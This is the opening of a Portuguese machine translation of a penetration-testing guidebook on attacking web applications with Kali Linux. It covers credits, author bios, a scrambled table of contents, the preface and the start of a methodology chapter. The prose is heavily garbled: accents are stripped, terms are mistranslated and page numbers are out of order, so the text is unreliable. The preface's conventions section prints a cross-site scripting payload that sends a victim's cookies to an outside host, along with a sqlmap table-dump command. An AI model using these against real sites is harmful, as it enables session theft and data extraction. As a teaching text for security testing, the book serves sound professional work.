Vous êtes sur la page 1sur 342

Teste de Invaso Web com

Kali Linux
Um guia prtico para a implementao de testes de penetrao
estratgias em sites, aplicaes web e padro
protocolos da web com Kali Linux.
Jos Muniz
Aamir Lakhani
BIRMINGHAM - MUMBAI
Teste de Invaso Web com Kali Linux
Copyright 2013 Packt Publishing
Todos os direitos reservados. Nenhuma parte deste livro pode ser reproduzida, armazenada em
um
sistema, ou transmitida de qualquer forma ou por qualquer meio, sem a prvia e por escrito
permisso do editor, exceto no caso de breves citaes embutidas em
artigos ou crticas.
Todo esforo foi feito na preparao deste livro para garantir a preciso
das informaes apresentadas. No entanto, a informao contida neste livro
vendido sem garantia, expressa ou implcita. Nem os autores, nem Packt
Publishing, e os seus revendedores e distribuidores sero responsveis por quaisquer danos
causados ou supostamente causados direta ou indiretamente por este livro.
Packt Publishing tem se esforado para fornecer informaes sobre marca registrada de todos os
empresas e produtos mencionados neste livro atravs da utilizao adequada de capitais.
No entanto, Packt Publishing no pode garantir a preciso das informaes.
Data de publicao: setembro 2013
Referncia de Produo: 1180913
Publicado por Packt Publishing Ltd.
Livery Lugar
35 Livery Rua
Birmingham B3 2PB, Reino Unido.
ISBN 978-1-78216-316-9
www.packtpub.com
Cubra Imagem por Karl Moore (karl.moore @ ukonline.co.uk)
[FM-2]
Crditos
Autores
Jos Muniz
Aamir Lakhani
Revisores
Revisores
Adrian Hayter
Danang Heriyadi
Tajinder Singh Kalsi
Brian Sak
Kunal Sehgal
Nitin.K. Sookun (ISH)
Aquisio do Editor
Vinay Argekar
Editor Tcnico chumbo
Amey Varangaonkar
Editores Tcnicos
Pooja Arondekar
Sampreshita Maheshwari
Menza Mathew
Indexador
Monica Ajmera Mehta
Grficos
Ronak Dhruv
Coordenador de Produo
Aditi Gajjar
Capa Trabalho
Aditi Gajjar
Christopher Smith
Clyde Jenkins
Coordenador do Projeto
Anugya Khurana
[FM-3]
Sobre os autores
Jos Muniz um arquiteto de solues tcnicas e de segurana pesquisador. Ele comeou
sua carreira em desenvolvimento de software e redes depois gerida como um contratado
recurso tcnico. Joseph mudou-se para consultoria e descobriu uma paixo por segurana
durante a reunio com uma variedade de clientes. Ele esteve envolvido com o projeto
e implementao de vrios projetos que vo desde empresas Fortune 500 para
grandes redes federais.
Joseph executado TheSecurityBlogger.com site, um dos recursos mais populares sobre
segurana e implementao do produto. Voc tambm pode encontrar Joseph falando em eventos ao
vivo
, bem como com outras publicaes envolvido. Os acontecimentos recentes incluem alto-falante for
Social
Mdia Deception na conferncia ASIS Internacional de 2013, alto-falante para Eliminar
Rede pontos cegos com webinar Data Center Segurana, alto-falante para fazer Trazer
Seu prprio dispositivo (BYOD) Trabalhar no Solutions Forum Governo, Washington
DC, e um artigo sobre a comprometer senhas em PenTest Magazine - Backtrack
Compndio, julho de 2013.
Fora do trabalho, ele pode ser encontrado por trs de toca-discos de vinil arranhando clssico ou
no
o campo de futebol mexer com os clubes locais.
Este livro no poderia ter sido feito sem o apoio da minha
encantadora esposa Ning e inspiraes criativas da minha filha
Raylin. Eu tambm deve creditar a minha paixo por aprender a meu irmo
Alex, que me criou junto com meus pais amorosos Irene e Ray.
E eu gostaria de dar um agradecimento final que a todos os meus amigos,
familiares e colegas que me apoiaram ao longo dos anos.
[FM-4]
Aamir Lakhani uma das principais Cyber Security e Cyber Contra
arquiteto. Ele responsvel pelo fornecimento de solues de TI de segurana para grandes
comercial
e organizaes empresariais federais.
Lakhani lidera projetos que implementam posturas de segurana para empresas da Fortune 500,
o Departamento de Defesa dos EUA, os principais provedores de sade, instituies de ensino,
e financeira e organizaes de mdia. Lakhani projetou contra-ofensiva
medidas de defesa para as agncias de defesa e inteligncia e organizaes tem assistido
em defender-se do ataque ativo de volta os ataques perpetrados por metro
grupos cibernticos. Lakhani considerado um lder na indstria de apoio detalhado
compromissos de arquitetura e projetos sobre tpicos relacionados defesa ciberntica, mobile
ameaas de aplicao, malware e ameaas persistentes avanadas de pesquisa (APT), e
Segurana das Trevas. Lakhani o autor e colaborador de vrios livros, e tem
apareceu na National Public Radio como um especialista em Cyber Security.
Escrevendo sob o pseudnimo de Dr. Chaos, Lakhani tambm opera o DrChaos.com
blogue. Em sua lista recente de 46 federais Tecnologia Peritos para Siga no Twitter, a Forbes
revista descreveu Aamir Lakhani como "um blogueiro, especialista infosec, super-heri ... e
todo bom homem. "
Eu gostaria de dedicar este livro aos meus pais, e Mahmood
Nasreen, e irms, e Noureen Zahra. Obrigado por sempre
incentivando o pequeno hacker mim. Eu no poderia ter feito isso sem
seu apoio. Obrigado me e pai por seus sacrifcios. Eu faria
Tambm gosto tambm de agradecer aos meus amigos e colegas para o seu
incontvel encorajamento e orientao. Estou verdadeiramente abenoado para ser
trabalhando com as pessoas mais inteligentes e mais dedicadas do mundo.
[FM-5]
Sobre os Revisores
e quebrar em aplicaes web. Ele possui um Mestrado licenciatura em Segurana da Informao
e uma licenciatura Formado em Cincia da Computao pela Royal Holloway, Universidade de
Londres.
Adrian Hayter um testador de penetrao com mais de 10 anos de experincia em
desenvolvimento
em engenharia e software explorao reversa com mais de cinco anos mos
na experincia.
Ele est atualmente trabalhando em Hatsecure como um instrutor para "Exploit avanada e
Shellcode Desenvolvimento ". Como pesquisador, ele gosta de compartilhar o conhecimento de TI
Segurana
em seu blog em FuzzerByte (http://www.fuzzerbyte.com).
Gostaria de agradecer aos meus pais por me dar vida, sem eles, eu
no estaria aqui hoje, minha namorada para me apoiar cada dia
com sorriso e amor, meus amigos, que eu no posso descrever um por um.
Danang Heriyadi um pesquisador de segurana de computadores indonsia especializada
[FM-6]
Technologies Pvt. Ltd, com mais de seis anos de experincia de trabalho na rea de
TI. Ele comeou sua carreira com WIPRO como Associate Tcnico, e mais tarde tornou-se
Consultor cum instrutor de TI. A partir de agora, ele realiza seminrios em faculdades em todo
ndia, sobre temas, tais como a segurana da informao, desenvolvimento de aplicaes Android,
computing desenvolvimento de sites, e nuvem, e cobriu mais de 100 faculdades
e cerca de 8500 estudantes, mais at agora. Alm de treinamento, ele tambm mantm um blog
(www.virscent.com / blog), Que bate em vrios truques de hackers. Peg-lo
no facebook em-www.facebook.com / tajinder.kalsi.tj ou seguir o seu
stiowww.tajinderkalsi.com.
Gostaria especialmente de agradecer Krunal Rajawadha (Autor
Executivo de Relacionamento na Packt Publishing) para vir atravs de mim
atravs do meu blog e me oferecer esta oportunidade. Gostaria tambm
de agradecer minha famlia e amigos ntimos para me apoiar quando eu estava
trabalhando neste projeto.
Tajinder Singh Kalsi o co-fundador e Chief Technical Evangelist em Virscent
Brian Sak, CCIE # 14441, atualmente um Arquiteto de Solues Tcnico da Cisco
Sistemas, onde ele est envolvido no desenvolvimento de solues e ajuda os parceiros da Cisco
construir e melhorar os seus servios de consultoria. Antes da Cisco, Brian realizada segurana
servios de consultoria e avaliao para grandes instituies financeiras, governo dos EUA
organismos e empresas da Fortune 500. Ele tem quase 20 anos de indstria
experincia com a maioria dos que passaram em Segurana da Informao. Alm de
inmeras certificaes de segurana e da indstria tcnicas, Brian tem um mestrado
em Segurana da Informao e Assurance, e um contribuinte para o Centro de
Internet Security e outros livros e publicaes com foco em segurana.
[FM-7]
o curso de segurana do ciberespao da faculdade da Gergia (Canad), e tem sido
associado com organizaes financeiras desde ento. Isso no s lhe deu
experincia em um lugar onde a segurana crucial, mas tambm lhe forneceu
valiosos conhecimentos especializados no campo.
Kunal Sehgal (KunSeh.com) Entrou no setor de segurana de TI aps a concluso
Atualmente, ele dirige est dirigindo as operaes de TI de segurana, para a Regio APAC de um
dos maiores bancos europeus. No geral, ele tem cerca de 10 anos de experincia em diversas
funes que vo desde a avaliao de vulnerabilidade, a governana de segurana e de
avaliao de risco para monitoramento de segurana. Ele possui uma srie de certificaes para o seu
nomear, incluindo prpria OSCP do Backtrack, e outros, como TCNA, CISM,
CCSK, Security +, roteador Cisco de Segurana, ISO 27001 LA, ITIL.
Nitin Sookun (MBCS) um nerd apaixonado que residem no corao de
Oceano ndico, na bela ilha de Maurcio. Ele comeou sua carreira de computao
como empresrio e fundou Indra Co. Ltd. Na busca de mais um desafio, ele
entregou a gesto do negcio sobre a sua famlia e se juntou Linkbynet indiano
Oceano Ltd como Engenheiro de sistema Unix / Linux. Ele atualmente um engenheiro da Laranja
Servios s empresas.
Nitin tem sido um defensor openSUSE desde 2009 e passa seu tempo livre
evangelizando Linux e FOSS. Ele um membro ativo de vrios grupos de usurios
e projetos de cdigo aberto, entre elas openSUSE Project, MATE Project Desktop,
Fundao Software Livre, Linux User Group de Maurcio, eo Maurcio
Artesanato de software comunitrio.
Ele gosta de scripting em Bash, Perl, e Python, e geralmente publica seu trabalho sobre
seu blog. Seu mais recente trabalho "Projeto Evil Genius" um roteiro adaptado para porta / install
Ferramentas de Teste de Invaso em openSUSE. Seus tutoriais so muitas vezes traduzidos para
vrios
lnguas e compartilhada dentro da comunidade open source. Nitin um pensador livre
e acredita em compartilhar conhecimento. Ele gosta de socializar com os profissionais de
vrios campos.
[FM-8]
www.PacktPub.com
Arquivos de suporte, eBooks, ofertas de desconto e mais
Voc pode querer visitar www.PacktPub.com para os arquivos de suporte e downloads relacionados
ao seu livro.
Voc sabia que Packt oferece verses e-book de todos os livros publicados, com PDF
e arquivos disponveis ePub? Voc pode atualizar para a verso e-book em www.PacktPub.
com e como um cliente livro impresso, voc tem direito a um desconto na cpia eBook.
Entre em contato com a gente no service@packtpub.com para mais detalhes.
Em www.PacktPub.com, Voc tambm pode ler uma coleo de artigos tcnicos gratuitos, sinal
-se para uma srie de boletins informativos gratuitos e receber descontos exclusivos e ofertas em
Packt
livros e eBooks.
TM
http://PacktLib.PacktPub.com
Voc precisa de solues imediatas para suas perguntas de TI? PacktLib est online de Packt
biblioteca de livros digitais. Aqui, voc pode acessar, ler e pesquisar em toda Packt
biblioteca de livros.
Por que assinar?



Totalmente pesquisvel atravs de cada livro publicado pela Packt
Copiar e colar, imprimir e contedo favorito
On demand e acessvel via navegador
Se voc tiver uma conta com a Packt www.PacktPub.com, Voc pode usar isso para o acesso
PacktLib hoje e vista nove livros totalmente gratuitos. Basta usar suas credenciais de login
para acesso imediato.
[FM-9]
Acesso gratuito para os titulares de contas Packt
ndice analtico
Prefcio
Captulo 1: Teste de Invaso e Configurao
Conceitos de testes de penetrao de aplicativos Web
Metodologia Teste de Invaso
Calculando risco
Conceitos Kali Testes de Penetrao
Passo 1 - Reconhecimento
Etapa 2 - Avaliao Alvo
Passo 3 - Explorao
Passo 4 - Privilege Escalation
Passo 5 - a manuteno de um ponto de apoio
Apresentando Kali Linux
Configurao do sistema Kali
Correndo Kali Linux a partir de uma mdia externa
Instalando Kali Linux
Kali Linux e VM imagem primeira corrida
Viso geral ferramentas Kali
Resumo
Objetivos de reconhecimento
A pesquisa inicial
Site da empresa
Fontes de histria Web
Registros Regionais da Internet (RIRs)
Eletrnico coleta de dados, anlise e recuperao (EDGAR)
Recursos de mdia social
Confiana
8
9
14
17
17
18
19
19
20
21
21
21
22
29
29
31
1
7
Captulo 2: Reconhecimento 33
34
34
35
36
39
40
41
41
ndice analtico
Postagens de emprego
Localizao
Shodan
Google hackers
Google Hacking Banco de Dados
Pesquisando redes
Nmap
HTTrack - clonar um site
Tcnicas de reconhecimento de ICMP
Tcnicas de reconhecimento DNS
Identificao do alvo DNS
Grficos de coleta de informaes - Maltego
FOCA - site metadados Reconnaissance
41
42
42
44
45
48
49
52
53
55
57
66
59
Ataques do lado do servidor: Captulo 3
A avaliao da vulnerabilidade
Webshag
Skipfish
ProxyStrike
Vega
OWASP-Zap
Websploit
Explorao
Metasploit
w3af
Explorando os sistemas de e-mail
Ataques de fora bruta
Hidra
DirBuster
WebSlayer
Cracking senhas
John the Ripper
Man-in-the-middle
Tira SSL
Resumo
Resumo
Iniciando o ataque - redirecionamento
Configurando o redirecionamento de porta usando o
Iptables
74
74
78
81
85
89
95
96
96
102
105
107
107
110
113
119
119
121
122
127
123
124
73
72
Ataques do lado do cliente: Captulo 4
A engenharia social
Engenharia Social Toolkit (SET)
Usando SET para clonar e ataque
[Ii]
129
129
130
132
ndice analtico
MitM Proxy
Hospedar digitalizao
Hospedar digitalizao com Nessus
Obteno e rachaduras senhas de usurios
As senhas do Windows
Kali quebra de senha ferramentas
Johnny
hashcat e oclHashcat
samdump2
chntpw
Ophcrack
Crunch
Outras ferramentas disponveis no Kali
Hash-identificador
dictstat
RainbowCrack (rcracki_mt)
findmyhash
phrasendrescher
CmosPwd
creddump
Resumo
Montagem do Windows
Senhas Linux
Instalando o Nessus em Kali
Usando o Nessus
143
144
145
151
153
155
156
159
161
161
165
168
170
170
171
172
173
173
173
174
174
177
177
178
179
180
180
180
181
182
183
184
187
190
193
193
154
155
145
146
Autenticao Atacar: Captulo 5
Atacar o gerenciamento de sesses
Clickjacking
Cookies de sesso Sequestro web
Sesso de Ferramentas Web
Plugins do Firefox
Firesheep - Plugin do Firefox
Web Developer - Plugin do Firefox
Greasemonkey - Plugin do Firefox
Biscoito Injector - Plugin do Firefox
Os cookies Gestor + - Plugin do Firefox
Biscoito Cadger
Wireshark
Hamster e Ferret
Man-in-the-middle ataque
dsniff e arpspoof
175
[Iii]
ndice analtico
Captulo 6: Ataques Web
Ettercap
Emalhe
SQL Injection
SqlMap
Cross-site scripting (XSS)
Testando cross-site scripting
Cookie de XSS roubo / sequestro Autenticao
Outras ferramentas
urlsnarf
acccheck
hexinject
Patator
DBPwAudit
Resumo
Explorao Navegador Quadro - Carne
FoxyProxy - Plugin do Firefox
BURP Proxy
OWASP - ZAP
Colheita senha SET
Fimap
Negao de Servios (DoS)
THC-SSL-DOS
Scapy
SlowLoris
Low Orbit Ion Canho
Outras ferramentas
DNSCHEF
SniffJoke
Cerco
Inundator
TCPReplay
Resumo
Testando suas defesas
Segurana da linha de base
STIG
O gerenciamento de patches
As diretivas de senha
211
211
216
218
225
230
234
235
236
238
240
242
245
245
246
247
248
248
249
252
253
254
254
256
196
198
200
203
204
205
206
208
208
209
209
210
210
210
Captulo 7: contramedidas defensivas 251
[Iv]
ndice analtico
Espelhe o seu ambiente
HTTrack
Outras ferramentas de clonagem
Man-in-the-middle defesa
Defesa tira SSL
Negao de Servio defesa
Defesa de Cookies
Defesa Clickjacking
Forense digital
Kali Forensics Bota
dc3dd
Outras ferramentas forenses em Kali
chkrootkit
Autpsia
Binwalk
pdf-parser
Principal
Pasco
Bisturi
bulk_extractor
Anlise do Sistema de Arquivos com Kali
257
257
259
259
261
262
263
264
265
266
269
271
271
271
274
275
275
275
276
276
267
Captulo 8: Teste de Penetrao Relatrio Executivo
Observncia
Os padres da indstria
Servios profissionais
Documentao
Formato do relatrio
Capa
Declarao de Confidencialidade
Controle de documentos
Timeline
Resumo executivo
Metodologia
Procedimentos de teste detalhadas
Resumo dos resultados
Vulnerabilidades
Consideraes de rede e recomendaes
Apndices
Glossrio
Resumo
277
276
278
279
280
282
282
283
283
284
284
285
286
288
289
290
292
294
294
[V]
ndice analtico
ndice
Declarao de Trabalho (SOW)
Teste de Invaso Externa
Material adicional SOW
Kali ferramentas de relatrios
Dradis
KeepNote
Maltego CaseFile
MagicTree
CutyCapt
Exemplos de relatrios
Resumo
313
295
296
298
300
300
301
301
301
302
302
311
[Vi]
Prefcio
Kali um arsenal Teste de Invaso baseado no Debian Linux usado por segurana
profissionais (e outros) para realizar avaliaes de segurana. Kali oferece uma
variedade de conjuntos de ferramentas personalizadas para identificar e explorar
vulnerabilidades em
sistemas. Este livro escrito ferramentas de alavancagem disponveis em Kali Linux
liberados
13 de maro, 2013, bem como outras aplicaes de cdigo aberto.
Teste de Invaso Web com Kali Linux projetado para ser um guia para profissionais
Testadores de penetrao que procuram incluir Kali em uma penetrao de aplicaes web
noivado. Nosso objetivo identificar a melhor ferramenta de Kali (s) para uma tarefa especfica,
fornecer detalhes sobre como usar o aplicativo (s), e oferecem exemplos do que informaes
poderia ser obtida para fins de com base em experincia de campo especialista relatrio. Kali tem
vrios programas e utilitrios, no entanto, este livro vai concentrar-se na ferramenta mais forte (s)
para uma tarefa especfica no momento da publicao.
Os captulos deste livro so divididos em tarefas utilizados na aplicao web do mundo real
Teste de Invaso. Captulo 1, testes de penetrao e de instalao, fornece uma viso geral
Testes de Penetrao conceitos bsicos, estratgias de servios profissionais, fundo
sobre o meio ambiente Kali Linux, ea criao de Kali para temas apresentados neste livro.
Captulos 2-6, abrangem vrios aplicativos web conceitos de testes de penetrao, incluindo
exemplos de configurao e relatrios destinados a destacar temas abordados se pode
realizar seu objetivo desejado.
Captulo 7, contramedidas defensivas, serve como uma fonte de reparao em sistemas
vulnervel a ataques apresentados nos captulos anteriores. Captulo 8, Teste de Penetrao
Relatrio Executivo, oferece relatrios melhores prticas e exemplos que podem servir como
modelos para a construo de relatrios de nvel executivo. O objetivo de projetar o livro em
desta forma dar ao leitor um guia para envolver uma penetrao de aplicaes web
com a ferramenta melhor possvel (s) disponvel em Kali, oferecer medidas para remediar uma
vulnerabilidade
e fornecer dados capturados como poderia ser apresentada de uma forma profissional.
Prefcio
O que este livro cobre
Captulo 1, testes de penetrao e de instalao, abrange os fundamentos da construo de
uma
prtica profissional Teste de Invaso. Os tpicos incluem a diferenciao de um
Teste de Penetrao de outros servios, descrio da metodologia e direcionamento
aplicaes web. Este captulo tambm fornece passos utilizados para configurar uma Kali
Ambiente Linux para tarefas abordados neste livro.
Captulo 2, Reconhecimento, fornece vrias maneiras de coletar informaes sobre um
alvo. Os tpicos incluem ferramentas gratuitas populares destacando disponveis na Internet
como
bem como a recolha de informao utilitrios disponveis em Kali Linux.
Captulo 3, os ataques lado do servidor, centra-se na identificao e explorao de
vulnerabilidades
em servidores web e aplicaes. Ferramentas cobertos esto disponveis em Kali ou outro aberto
utilitrios de origem.
Captulo 4, Ataques lado do cliente, alvos hospeda sistemas. Os tpicos incluem a engenharia social,
explorando vulnerabilidades do sistema host e atacando as senhas, pois so os mais
meio comum para proteger os sistemas host.
Captulo 5, Atacar de autenticao, analisa a forma como os usurios e dispositivos para autenticar
web
aplicaes. Os tpicos incluem a segmentao do processo de gerenciamento de sesses de
autenticao,
comprometer a forma como os dados so armazenados em sistemas host, e man-in-the-middle
ataque
tcnicas. Este captulo tambm aborda brevemente em SQL e ataques Cross-Site Scripting.
Captulo 6, ataques na Web, explora como tirar proveito de servidores web e
aplicaes web que utilizam exploits de compromisso como a explorao de navegador,
procurao
ataques, e colheita de senha. Este captulo abrange igualmente os mtodos para interromper
servios utilizando tcnicas de negao de servio.
Captulo 7, contramedidas defensivas, fornece as melhores prticas para o seu endurecimento
aplicaes web e servidores. Os tpicos incluem linhas de base de segurana, gerenciamento de
patches,
polticas de senha, e defender-se contra os mtodos de ataque abordados no anterior
captulos. Este captulo tambm inclui uma seo forense focados, pois importante
para investigar adequadamente um ativo comprometido para evitar impacto negativo adicional.
Captulo 8, Penetrao Teste Relatrio Executivo, abrange as melhores prticas para o
desenvolvimento de
Penetrao ps relatrios de servio de teste profissionais. Os tpicos incluem uma viso geral
de mtodos para agregar valor ao seu produto final, a formatao do documento e os modelos
que pode ser usado para construir relatrios profissionais.
[2]
Prefcio
O que voc precisa para este livro
Os leitores devem ter uma compreenso bsica de aplicaes web, networking
conceitos e metodologia de testes de penetrao. Este livro vai incluir detalhada
exemplos de como executar um ataque usando ferramentas oferecidas em Kali Linux, bem como
outras aplicaes de cdigo aberto. No necessrio, mas benfico ter experincia
usando verses anteriores do Backtrack ou programas similares.
Os requisitos de hardware para a construo de um ambiente de laboratrio e criao da Kali
Arsenal Linux so abordados em Captulo 1, testes de penetrao e de Instalao.
Que este livro para
O pblico-alvo deste livro so testadores de penetrao profissionais ou outros
olhando para maximizar Kali Linux para um Teste de Invaso do servidor web ou aplicao
exerccio. Se voc est procurando identificar como realizar um teste de penetrao contra
aplicaes web e achados a um cliente uma forma profissional, em seguida,
este livro para voc.
Convenes
Neste livro, voc vai encontrar uma srie de estilos de texto que distinguem entre
diferentes tipos de informao. Aqui esto alguns exemplos desses estilos, e um
explicao do seu significado.
Palavras de cdigo no texto so apresentados da seguinte forma: "Por exemplo, voc pode ligar
para o perfil
My First Scan ou qualquer outra coisa que voc gostaria. "
Um bloco de cdigo definido da seguinte
forma:
<script> document.write ("<img src = 'http://kali.drchaos.com/var/www/xss_
laboratrio / lab_script.php? "+ document.cookie +"> ") </ script>
Qualquer entrada de linha de comando ou a sada escrita da
seguinte forma:
SqlMap-u http://www.drchaous.com/article.php?id=5
teste - despejo
-U teste-dump
-T-L tablesnamehere
[3]
Prefcio
Novos termos e palavras importantes so mostradas em negrito. As palavras que voc v na
tela, em menus ou caixas de dilogo, por exemplo, aparecem no texto assim: "Em breve
como ns, clique no Executar boto, ns recebemos uma injeo de SQL ".
Avisos ou notas importantes aparecem em uma caixa como esta.
Dicas e truques aparecer assim.
Feedback do leitor
O feedback dos nossos leitores sempre bem-vindo. Deixe-nos saber o que voc pensa
Neste livro, o que voc gostou ou no gostou pode ter. Feedback do leitor importante para o
nos a desenvolver ttulos que voc realmente tirar o mximo proveito de.
Para nos enviar feedback geral, basta enviar um e-mail para feedback@packtpub.com,
e mencionar o ttulo do livro atravs do assunto da mensagem.
Se existe um tema que voc tem experincia em e voc est interessado em qualquer escrita
ou contribuir para um livro, consulte o nosso guia autor em www.packtpub.com / autores.
Atendimento ao Cliente
Errata
Agora que voc o orgulhoso proprietrio de um livro Packt, temos uma srie de coisas para
ajud-lo a obter o mximo de sua compra.
Embora tenhamos tomado todos os cuidados para garantir a exatido dos nossos contedos, erros
acontecem. Se voc encontrar um erro em um dos nossos livros, talvez um erro no texto ou
o cdigo-ficaramos muito gratos se voc iria relatar isso para ns. Ao fazer isso, voc pode
salvar outros leitores de frustrao e nos ajudar a melhorar as verses subseqentes deste
livro. Se voc encontrar qualquer errata, por favor informe-los visitando http://www.packtpub.
com.br / submeter-errata, A seleo de seu livro, clicando no formulrio de apresentao de errata link,
e inserir os detalhes da sua errata. Uma vez que seu errata so verificados, a sua submisso
Sero aceitos ea errata ser carregado no nosso site, ou adicionado a qualquer lista de
errata existente, sob a seo Errata desse ttulo. Qualquer errata existente pode ser visto
seleccionando o seu ttulo de http://www.packtpub.com/support.
[4]
Prefcio
Pirataria
A pirataria de material com direitos autorais na internet um problema constante em todas as
mdias.
No Packt, tomamos a proteo de nossos direitos autorais e licenas muito a srio. Se voc
deparar com as cpias ilegais de nossos trabalhos, sob qualquer forma, na internet, por favor
nos fornecer o endereo de localizao ou nome do site imediatamente para que possamos
buscar um remdio.
Entre em contato conosco copyright@packtpub.com com um link para a suspeita
material pirateado.
Agradecemos a sua ajuda na proteo de nossos autores, e nossa capacidade de trazer
voc um contedo valioso.
Perguntas
Voc pode contatar-nos em questions@packtpub.com se voc est tendo um problema
com qualquer aspecto do livro, e ns faremos o nosso melhor para resolv-lo.
[5]
Teste de Invaso
e Configurao
Muitas organizaes oferecem servios de segurana e de uso de termos tais como auditoria de
segurana,
rede ou avaliao de risco, e Penetration Test com significados sobrepostos.
Por definio, uma auditoria uma avaliao tcnica mensurvel de um sistema (s) ou
aplicativo (s). As avaliaes de segurana so as avaliaes de risco, ou seja, os servios
usado para identificar vulnerabilidades em sistemas, aplicaes e processos.
Teste de Invaso vai alm de uma avaliao atravs da avaliao identificado
vulnerabilidades para verificar se a vulnerabilidade real ou um falso positivo. Por exemplo,
uma auditoria ou uma avaliao pode utilizar ferramentas de verificao que fornecem algumas
centenas
possveis vulnerabilidades em vrios sistemas. Um teste de penetrao tentaria
para atacar essas vulnerabilidades da mesma maneira como um hacker malicioso para verificar
quais vulnerabilidades so genunos reduzir a lista verdadeira das vulnerabilidades do sistema para
um punhado de falhas de segurana. Os Testes de Penetrao mais eficazes so os que
que visam um sistema muito especfico, com um objetivo muito especfico. Qualidade sobre a
quantidade
o verdadeiro teste de um teste de penetrao bem-sucedida. Enumerando um nico sistema
durante
um ataque direcionado revela mais sobre a segurana do sistema e tempo de resposta para lidar
com
incidentes que ataque amplo espectro. Escolhendo cuidadosamente alvos valiosos, uma
Verificador da penetrao pode determinar toda a infra-estrutura de segurana e associado
risco de um ativo valioso.
O Teste de Invaso no tornar as redes mais seguras!
Teste de Invaso e Configurao
Esta uma m interpretao comum e deve ser claramente explicado a todos os potenciais
clientes. Teste de Invaso avalia a eficcia da segurana existente. Se
um cliente no tem uma forte segurana, em seguida, eles vo receber pouco valor a partir de
Servios de testes de penetrao. Como consultor, recomenda-se que a penetrao
Os servios de anlise so oferecidos como forma de verificar a segurana para os sistemas
existentes, uma vez
um cliente acredita que eles tenham esgotado todos os esforos para assegurar a esses sistemas e
so
pronto para avaliar se existem lacunas existentes na obteno desses sistemas.
Posicionando um escopo adequado de trabalho fundamental quando a venda de servios de testes
de penetrao.
O escopo do trabalho define o que os sistemas e as aplicaes esto a ser alvo, bem como
o que conjuntos de ferramentas podem ser usadas para comprometer vulnerabilidades que so
encontradas. Melhores prticas
est a trabalhar com o seu cliente durante uma sesso de design para desenvolver um escopo
aceitvel
de trabalho que no tem impacto sobre o valor dos resultados.
Teste de Invaso Web com Kali Linux-o prxima gerao de BackTrack-se uma
hands-on guia que ir fornecer-lhe passo-a-passo mtodos para encontrar vulnerabilidades
e explorao de aplicaes web. Este livro vai cobrir alvos pesquisando, identificando
e explorao de vulnerabilidades em aplicaes web, bem como os clientes que usam web
servios de aplicao, defendendo aplicaes web contra ataques comuns, e
edifcio Teste de Invaso os produtos para a prtica de servios profissionais. Ns
acredito que este livro timo para quem est interessado em aprender como se tornar um
Verificador da penetrao, os usurios que so novos para Kali Linux e querem aprender as
caractersticas
e as diferenas de Kali contra BackTrack, e testadores de penetrao experientes que podem
precisa de uma reciclagem ou de referncia sobre novas ferramentas e tcnicas.
Este captulo vai quebrar os conceitos fundamentais por trs vrios segurana
servios, bem como orientaes para a construo de uma prtica profissional Teste de Invaso.
Conceitos incluem diferenciar um teste de penetrao de outros servios, a metodologia
viso geral, e visando aplicaes web. Este captulo tambm fornece uma breve
viso geral da criao de um teste de Kali Linux ou ambiente real.
Teste de Invaso aplicao Web
conceitos
A aplicao web qualquer aplicativo que usa um navegador web como um cliente. Esta lata
ser um frum de mensagens simples ou uma folha de clculo muito complexo. As aplicaes web
so
popular baseado na facilidade de acesso a servios e gerenciamento centralizado de um sistema
utilizado por vrios partidos. Requisitos para acessar um aplicativo web pode seguir
padres de cliente navegador indstria simplificar as expectativas, tanto do
prestadores de servios, bem como os anfitries acessar o aplicativo.
[8]
Captulo 1
As aplicaes web so o tipo mais utilizado de aplicaes dentro de qualquer
organizao. Eles so o padro para a maioria das aplicaes baseadas na Internet. Se voc olhar
em smartphones e tablets, voc vai descobrir que a maioria das aplicaes nesses dispositivos
tambm so aplicaes web. Isso criou uma superfcie rica em alvo novo e grande para
profissionais de segurana, bem como os atacantes exploram esses sistemas.
Aplicaes web de teste de penetrao podem variar em escopo j que h um grande nmero
de tipos de sistema e os casos de uso de negcios para servios de aplicativos web. O ncleo da
web
camadas de aplicaes que so servidores de hospedagem, dispositivos de acesso e depsito de
dados
deve ser testada, juntamente com a comunicao entre as camadas durante uma teia
exerccio Teste de Invaso aplicao.
Um exemplo para o desenvolvimento de um escopo para um teste de penetrao de aplicaes web
o teste
aplicaes de um servidor Linux de hospedagem para dispositivos mveis. O escopo do trabalho em
um
mnimo deve incluir a avaliao do servidor Linux (sistema operacional, rede
configurao, e assim por diante), as aplicaes alojadas no servidor, como os sistemas e
usurios autenticados, dispositivos clientes que acessam o servidor ea comunicao entre
todos os trs nveis. Outras reas de avaliao que podem ser includos no mbito da
trabalho so como os dispositivos so obtidos por funcionrios, como os dispositivos so usados
fora de
acessar o aplicativo, a rede (s) circundante, a manuteno dos sistemas,
e os usurios dos sistemas. Alguns exemplos de por que essas outras reas de abrangncia
assunto est tendo o servidor Linux comprometida, permitindo conexo a partir de um
dispositivo mvel infectado por outros meios ou a obteno de um dispositivo mvel autorizado
atravs de mdias sociais para capturar informaes confidenciais.
Ns inclumos modelos para definir o escopo de uma penetrao de aplicaes web em Captulo
8, Penetrao Teste Relatrio Executivo. Alguns exemplos Deliverable nesta oferta captulo
levantamentos checkbox que podem ajudar com andar um cliente atravs de possveis alvos
para uma aplicao web mbito Teste de Invaso de trabalho. Cada escopo do trabalho deve
ser personalizado em torno de objetivos de negcio do seu cliente, prazo esperado de
desempenho, recursos alocados, e resultado desejado. Como afirmado anteriormente, os modelos
servem como ferramentas para melhorar uma sesso de design para o desenvolvimento de um
escopo de trabalho.
Metodologia Teste de Invaso
H passos lgicos recomendados para a realizao de um teste de penetrao. O primeiro
passo identificar o status de iniciar o projeto. A terminologia mais comum
definindo o estado de partida Caixa-preta teste, Caixa branca teste, ou uma mistura
entre branco e preto teste de caixa conhecido como Caixa cinza teste.
[9]
Teste de Invaso e Configurao
Caixa preta assume o verificador da penetrao no tem conhecimento prvio do alvo
rede, os processos da empresa, ou servios que fornece. Iniciando um projeto de caixa preta
requer uma grande quantidade de reconhecimento e, tipicamente, um acoplamento mais com
base no
conceito que os atacantes do mundo real podem passar longos perodos de tempo estudando alvos
antes de lanar ataques.
Como um profissional de segurana, encontramos testes de caixa preta apresenta alguns
problemas quando
escopo um teste de penetrao. Dependendo do sistema e sua familiaridade com
o meio ambiente, pode ser difcil estimar quanto tempo a fase de reconhecimento
vai durar. Isso geralmente apresenta um problema de faturamento. Os clientes, na maioria dos
casos, no so
disposto a assinar um cheque em branco para voc gastar tempo e recursos ilimitados em
a fase de reconhecimento, no entanto, se voc no passar o tempo necessrio, em seguida, o seu
Penetration Test acabou antes de comear. Tambm irrealista porque um motivado
atacante no ter, necessariamente, os mesmos de escopo e de faturamento restries na
Tester Penetrao profissional. por isso que recomendamos caixa cinza sobre
